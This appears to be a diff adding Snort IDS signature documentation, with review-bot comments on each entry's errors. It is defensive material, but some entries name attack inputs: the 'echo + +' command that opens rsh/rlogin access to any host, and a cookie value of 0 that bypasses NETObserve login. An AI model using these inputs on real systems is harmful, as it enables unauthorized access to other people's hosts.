+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
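Review bot: "Microsoft Windows Server 2000" in Affected Systems is not a product name; it should be "Microsoft Windows 2000 Server". There is a stray blank line between the "-- " separator and "Corrective Action:" that the rest of the file does not use, and several separators have trailing spaces. Additional References is empty although Summary calls this a known vulnerability; the Microsoft security bulletin that shipped the patch should be cited.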
--- /dev/null
+++ b/doc/signatures/3145.txt
@@ -0,0 +1,77 @@
+Rule: 
+
+--
+Sid: 
+3145
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft systems using Server Message Block (SMB).
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+SMB is a client - server protocol used in sharing resources such as
+files, printers, ports, named pipes and other things, between machines
+on a network.
+
+A vulnerability in the Microsoft implementation of SMB exists due to a
+programming error which may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain unauthorized access to the target host.
+
+A malicious attacker can exploit the vulnerability by sending a
+malicious response from a server in response to a client request using
+SMB.
+
+--
+Affected Systems:
+	Microsoft Windows 2003
+	Microsoft Windows 2000
+	Microsoft Windows XP
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message from the server
+containing code of their choosing to be run on the client.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+Turn off windows file and print services.
+
+Use Samba as an alternative.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+eEye:
+http://www.eeye.com/html/research/advisories/AD20050208.html
+
+--
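Review bot: The Corrective Action advice does not match the vulnerability described. Detailed Information and Attack Scenarios both say the flaw is triggered by a malicious server response processed by the client, so "Turn off windows file and print services" and "Use Samba as an alternative" (server-side changes) do not protect the vulnerable client; the useful mitigation beyond patching is restricting outbound SMB (139/TCP and 445/TCP) to untrusted networks. Also "windows" should be capitalised, and "Microsoft Windows 2003" in Affected Systems should read "Microsoft Windows Server 2003".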
--- /dev/null
+++ b/doc/signatures/1269.txt
@@ -0,0 +1,77 @@
+Rule:
+
+--
+Sid:
+1269
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) rexd is listening.
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port rexd is using.  Attackers can also learn what versions of the rexd protocol are accepted by rexd.
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as rexd run.  The rexd RPC service allows remote program execution.  If weak authentication is used, an attacker user may run arbitrary commands as a user other than root.
+
+--
+Affected Systems:
+AIX 4.0
+Compaq Tru64 UNIX Any version
+HP-UX 10.20
+HP-UX 11
+Red Hat Linux 6.0
+Red Hat Linux 7.x
+Solaris 2.5.1
+Solaris 2.6
+Solaris 7
+Solaris 8
+Unix Any version
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where rexd runs.  This may be a precursor to accessing rexd.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access rexd, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for rexd, not probes of the rexd service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the rexd service itself. An attacker may attempt to go directly to the rexd port without querying the portmapper service which, would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/37
+
+CERT
+http://www.cert.org/advisories/CA-1992-05.html
+
+Arachnids 
+http://www.whitehats.com/info/IDS23
+
+
+--
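Review bot: The comma in False Negatives is misplaced: "without querying the portmapper service which, would not trigger the rule" should be "without querying the portmapper service, which would not trigger the rule". Affected Systems mixes product and version in one column ("Compaq Tru64 UNIX Any version", "Unix Any version"), and the "Unix Any version" entry makes the specific ones redundant. Since Detailed Information notes that rexd allows remote program execution with weak authentication, Corrective Action should say explicitly that rexd should be disabled unless required rather than leaving it under "Disable unneeded RPC services". There is also an extra blank line before the closing separator.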
--- /dev/null
+++ b/doc/signatures/2986.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+2986
+
+--
+Summary:
+This event is generated when an attempt is made to create an AndX entry
+via SMB.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to create an AndX entry
+via SMB.
+
+--
+Affected Systems:
+	Windows systems
+
+--
+Attack Scenarios:
+An attacker may attempt to bind to the service to manipulate host
+settings then create an entry in the winreg service.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+Microsoft Technet
+http://support.microsoft.com/support/kb/articles/q153/1/83.asp
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0562
+Winreg
+http://www.rutherfurd.net/python/winreg/
+
+--
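Review bot: Detailed Information repeats the Summary word for word and adds nothing, while Attack Scenarios introduces "the winreg service", which is mentioned nowhere else; the document should explain what an AndX entry is in SMB terms and how creating one relates to remote registry access, otherwise Impact "Unknown." is all an analyst has. The Microsoft KB URL uses the old "q153/1/83.asp" path form and should be checked to confirm it still resolves.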
--- /dev/null
+++ b/doc/signatures/100000179.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+100000179
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server using the TRACE command. In this case, the attack 
+is aimed at the Solaris Management Console Java Web Interface.
+
+--
+Impact:
+Possible disclosure of information.
+
+--
+Detailed Information:
+The TRACE method is used when debugging a webserver to ensure that server 
+returns information to the client correctly. When used with other 
+vulnerabilities it is possible to use the TRACE method to return sensitive 
+information from a webserver such as authentication data and cookies.
+
+This is known as a Cross Site Tracing (XST) attack.
+
+Note: Users who are using sid 2056 with the HTTP_PORTS variable set to 898 do 
+not need to use this rule.
+
+--
+Affected Systems:
+All platforms running a webserver that responds to the TRACE method.
+
+--
+Attack Scenarios:
+The attacker needs to perform a TRACE request to a vulnerable server.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+The TRACE method is legitimate and may be used to debug a webserver or can be 
+used to debug other networking equipment.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disable the webserver from responding to TRACE requests.
+
+--
+Contributors:
+Sid 2056 modification suggested by rmkml <rmkml@free.fr>
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+RFC:
+http://www.ietf.org/rfc/rfc2616.txt
+
+--
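Review bot: "to ensure that server returns information" in Detailed Information should read "to ensure that the server returns information", and "None Known" should be "None known" for consistency. Corrective Action "Disable the webserver from responding to TRACE requests" is awkward; "Configure the webserver not to respond to TRACE requests" is clearer. The note about sid 2056 and HTTP_PORTS set to 898 would be easier to find if it were also listed under Additional References as a related sid.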
--- /dev/null
+++ b/doc/signatures/2441.txt
@@ -0,0 +1,62 @@
+Rule:  
+
+--
+Sid:
+2441
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in ExploreAnywhere Software's NETObserve.
+
+--
+Impact:
+Execution of commands or control of remote machines being managed by the
+software.
+
+--
+Detailed Information:
+NETObserve is a software solution that can be used to remotely monitor
+and control Windows based machines. It's interface is accessed via HTTP.
+
+By setting a cookie value, used to send login information to NETObserve,
+to 0 an attacker can bypass any checks on login credentials. This can
+present the attacker with administrative privileges to the NETObserve
+application which can be used to manage other remote client machines.
+
+--
+Affected Systems:
+	NETObserve
+
+--
+Attack Scenarios:
+An attacker can set 'Cookie login:0' in a web request to the
+administrative interface and gain administrator access to the
+application.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
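Review bot: "It's interface" in Detailed Information should be "Its interface". The quoted 'Cookie login:0' in Attack Scenarios does not match HTTP Cookie header syntax; state the cookie name and value the rule actually matches so the documentation agrees with the signature. Corrective Action "Upgrade to the latest non-affected version" gives no version, and Additional References is empty; cite the vendor advisory or the fixed version.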
--- /dev/null
+++ b/doc/signatures/1594.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1594
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
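Review bot: This document never identifies which CGI application or script sid 1594 matches; the Summary, Detailed Information and Affected Systems text is generic boilerplate, so an analyst cannot triage the alert from it. Name the script and parameter the rule looks for, narrow Affected Systems from "All systems running CGI applications", and add a reference. Also "running ona web server" should read "running on a web server".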
--- /dev/null
+++ b/doc/signatures/2946.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2946
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
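Review bot: "Apply the appropriate vendor supplied patches" in Corrective Action is missing its terminating period. Since Detailed Information says the service is not started by default but can be abused locally for privilege escalation, Corrective Action should also tell the reader to verify that NetDDE has not been enabled on hosts where it is not required, not just to disable it.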
--- /dev/null
+++ b/doc/signatures/1348.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+1341
+
+--
+Summary:
+Attempted g++ command access via web
+
+--
+Impact:
+Attempt to compile a binary on a host.
+
+--
+Detailed Information:
+This is an attempt to compiile a C or C++ source on a host. The g++
+command is theGNU project's C and C++ compiler used to compile C and
+C++ sourcefiles into executable binary files. The attacker could
+possibly compilea program needed for other attacks on the system or
+install abinary program of his choosing.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains 'g++'in the URI.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries
+outside of it'sdesignated web root or cgi-bin. This command may also
+be requested on acommand line should the attacker gain access to the
+machine. Wheneverpossible, sensitive files and certain areas of the
+filesystem shouldhave the system immutable flag set to prevent files
+from being addedto the host. On BSD derived systems, setting the
+systems runtimesecurelevel also prevents the securelevel from being
+changed. (note: thesecurelevel can only be increased).
+--
+Contributors:
+Sourcefire Research Team
+
+-- 
+Additional References:
+sid: 1342
+sid: 1343
+sid: 1344
+sid: 1345
+sid: 1346
+sid: 1347
+sid: 1348
+
+--
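Review bot: The file is 1348.txt but the Sid field says 1341, and Additional References lists sid 1348 as a related rule, so this looks like a copy of the 1341 document that was never adapted; the Sid must match the filename and the self-reference removed. The text also has many missing spaces, apparently from a broken line join ("theGNU", "compilea", "abinary", "'g++'in", "it'sdesignated", "acommand", "Wheneverpossible", "shouldhave", "addedto", "runtimesecurelevel", "thesecurelevel"), plus "compiile" and "it's" for "its". The Affected Systems section is absent, and the "--" after Corrective Action lacks the blank line used elsewhere.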
--- /dev/null
+++ b/doc/signatures/1149.txt
@@ -0,0 +1,68 @@
+Rule:  
+
+--
+Sid:
+1149
+
+--
+Summary:
+This event is generated when an attempt is made to access Wwwcount 
+(count.cgi), a very popular CGI program used to track website usage.
+
+--
+Impact:
+Will allow access as with the privileges of the user running the 
+process.
+
+--
+Detailed Information:
+In particular, it enumerates the number of hits on given webpages and 
+increments them on a 'counter'. In October of 1997 two remotely 
+exploitable problems were discovered with this program. The first 
+problem was somewhat innocuous in that it only allowed remote users to 
+view .GIF files they were not supposed to have access to. This may be 
+dangerous if the site contains sensitive data in .GIF files such as 
+demographic/financial data in charts etc.
+
+The second and most serious problem is a buffer overflow in QUERY_STRING
+enviroment variable handled by the program. In essence a remote user can
+send an overloy long query to the program and overflow a buffer in order
+to execute their own commands as whatever privilege level the program is
+running as.
+
+--
+Attack Scenarios:
+Simple HTTP GET request.
+
+--
+Ease of Attack:
+Simple. Exploit code available
+
+--
+False Positives:
+A none vulnerable version of the application will generate events as the
+rule only looks for access to count.cgi during a established connection.
+
+--
+False Negatives:
+
+--
+Corrective Action:
+If you are running version 2.3 of Wwwcount it is suggested you upgrade 
+immediately. In the meantime you may wish to consider removing the 
+execution bit on this program. Versions 2.4 and above of this software 
+are available at: 
+
+http://www.fccc.edu/users/muquit/Count.html 
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Neal Timm <nealtimm@sbcglobal.net>
+
+-- 
+Additional References:
+
+--
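Review bot: Detailed Information opens with "In particular, it enumerates", where "it" refers back to count.cgi in the Summary; the paragraph should name the program so it reads stand-alone. Typos: "enviroment" (environment), "overloy" (overly), "A none vulnerable version" (A non-vulnerable version), "during a established connection" (an established). Impact "Will allow access as with the privileges" should be "Allows access with the privileges". False Negatives is empty and should at least say "None known". The False Positives text is the useful part: since the rule only matches access to count.cgi, every legitimate hit on a patched counter fires, which should also be reflected in Corrective Action.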
--- /dev/null
+++ b/doc/signatures/100000530.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+100000530
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "NC Linklist" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "view" parameter in the "index.php" script used 
+by the "NC Linklist" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using NC Linklist
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
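Review bot: The Impact and the second Detailed Information paragraph are copied from the remote-file-include template and overstate a reflected cross site scripting issue: "execute system binaries" and "unauthorized administrative access to the server" on the server side are not consequences of an XSS in the "view" parameter, whereas the Attack Scenarios text (a malicious link that steals information from the user who clicks it) describes the real impact and should drive the Impact section. Separators after the Sid, Affected Systems and Contributors sections lack the blank line used elsewhere, and there is a stray trailing blank line after the final "--".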
--- /dev/null
+++ b/doc/signatures/608.txt
@@ -0,0 +1,58 @@
+Rule: 
+
+--
+Sid: 608
+
+--
+Summary: 
+This event is generated when an attempt to modify access control permissions for remote shell logins is attempted.
+
+--
+Impact: 
+An attacker may have modified remote login permissions such that any host is allowed to initiate a remote session on the target host.
+
+-- 
+Detailed Information: 
+The rule generates an event when system reconfiguration is attempted via "rsh". 
+
+The command "echo + +" is used to relax access control permissions for r-services to allow access from any site without the need for password authentication. 
+
+This activity is indicative of attempts to abuse hosts using a default configuration. 
+
+Some UNIX systems use the "rsh" service to allow a connection to the machine for establishing an interactive session.
+
+--
+Attack Scenarios: 
+An attacker finds a machine with "rsh" enabled and reconfigures it to allow access from any location
+
+--
+Ease of Attack: 
+Simple, no exploit software required
+
+--
+False Positives: 
+None Known
+
+--
+False Negatives: 
+None Known
+
+--
+Corrective Action: 
+Investigate logs on the target host for further details and more signs of suspicious activity
+
+Use ssh for remote access instead of rlogin.
+
+--
+Contributors: 
+Original rule by Max Vision <vision@whitehats.com> modified from a signature written by Ron Gula
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+http://www.whitehats.com/info/IDS388
+
+--
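Review bot: Summary reads "when an attempt to modify ... is attempted"; drop the redundancy ("when an attempt is made to modify"). Detailed Information says "echo + +" relaxes r-services access control but does not say which file the command writes to, which is exactly what an investigator needs; Corrective Action should tell the reader to check the hosts.equiv and per-user .rhosts files for "+ +" entries rather than only "Investigate logs". Corrective Action also says "instead of rlogin" although the whole document concerns rsh; say "instead of rsh/rlogin". Attack Scenarios and Ease of Attack are missing their terminating periods.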
--- /dev/null
+++ b/doc/signatures/2568.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2568
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
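Review bot: This file is a verbatim copy of 1594.txt with only the Sid changed, including the "running ona web server" typo; it does not say which CGI script or parameter sid 2568 matches. Per-rule documentation should at minimum name the application and add a reference, otherwise the two entries cannot be told apart.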
--- /dev/null
+++ b/doc/signatures/382.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+382
+
+--
+Summary:
+This event is generated when an ICMP echo request is made from a Windows 9x or 2000 host. 
+
+--
+Impact:
+Information gathering.  An ICMP echo request can determine if a host is active.
+
+--
+Detailed Information:
+An ICMP echo request is used by the ping command to elicit an ICMP echo reply from a listening live host.  An echo request that originates from a Windows 9x or 2000 host contains a unique payload in the message request.
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+An attacker may attempt to determine live hosts in a network prior to launching an attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+An ICMP echo request may be used to legimately troubleshoot networking problems.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block inbound ICMP echo requests.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.org>
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS169
+
+--
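Review bot: "legimately" in False Positives should be "legitimately", and "Steven Alexander<alexander.s@mccd.edu>" is missing the space before the address. The contributor line cites vision@whitehats.org while the other files use vision@whitehats.com; these should agree. Corrective Action "Block inbound ICMP echo requests" is blunt advice for a fingerprinting rule; blocking at the border while permitting echo internally is the usual compromise and is worth stating.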
--- /dev/null
+++ b/doc/signatures/845.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+845
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
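Review bot: The Affected Systems section is empty, and the rest of the document is the generic authentication boilerplate; it never says which server or application sid 845 targets, so the Summary's "authentication vulnerability in a web server or an application" cannot be acted on. "running ona web server" should read "running on a web server". Additional References is empty.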
--- /dev/null
+++ b/doc/signatures/1695.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid: 1695
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an Oracle database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained superuser access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an Oracle database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+Oracle servers running on a Windows platform may listen on any arbitrary
+port. Change the $ORACLE_PORTS variable in snort.conf to "any" if this
+is applicable to the protected network.
+
+--
+
+Attack Scenarios: 
+Simple. These are Oracle database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+Configure your ORACLE_PORTS variable correctly for the environment you are in. 
+In many situations ORACLE negotiates a communication port. This means that 1521 
+and 1526 are not used for communication during the entire transaction. A new 
+port is negotiated after the initial connect message, all communication after 
+that uses this other port. If you are in an environment such as this, you should 
+set ORACLE_PORTS to "any" in snort.conf. 
+ 
+Otherwise, there are no known false negatives.
+
+-- 
+
+Corrective Action: 
+Use a firewall to disallow direct access to the Oracle database from sources external to the protected network.
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
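Review bot: "This connection can either be a legitimate telnet connection" in Detailed Information has no antecedent; no connection was mentioned, and a telnet session is not how an Oracle command reaches the listener, so the sentence should be dropped or rewritten. Attack Scenarios "Simple. These are Oracle database commands." is an Ease of Attack answer, not a scenario. The ORACLE_PORTS advice appears twice (Detailed Information as "$ORACLE_PORTS" and False Negatives as "ORACLE_PORTS") in inconsistent form; keep it once. The second Corrective Action sentence is missing its period.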
--- /dev/null
+++ b/doc/signatures/853.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+853
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
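Review bot: This is the third verbatim copy of the CGI authentication boilerplate (also 1594.txt and 2568.txt) with only the Sid changed, including the "running ona web server" typo. Without the script name and parameter sid 853 matches, the documentation cannot distinguish the three rules; name the application and add a reference.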
--- /dev/null
+++ b/doc/signatures/100000319.txt
@@ -0,0 +1,78 @@
+
+
+Rule:
+
+--
+Sid:
+100000319
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "ActualScripts" application running on a 
+webserver. Access to the file "direct.php" using a remote file being passed as 
+the "rf" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "rf" parameter in the "direct.php" script used by the 
+"ActualScripts" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
